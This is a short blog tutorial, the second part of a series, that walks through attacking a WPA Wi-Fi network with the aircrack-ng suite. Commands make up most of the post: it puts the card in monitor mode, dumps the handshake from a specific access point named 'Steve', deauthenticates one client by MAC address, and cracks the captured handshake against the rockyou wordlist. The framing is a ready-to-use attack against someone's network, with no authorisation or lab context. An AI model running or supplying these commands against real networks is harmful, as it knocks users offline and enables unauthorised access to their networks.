(Go to part1)
Let's check the wi-fis:
# airodump-ng mon0
The Deauth attack
Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.
# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap
This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.
# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5
And we get the handshake.
Now we crack it. We will use a wordlist.
# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt
if the password is in the wordlist, then
Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.
2 thoughts on “Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng”
nice article i really learnt from it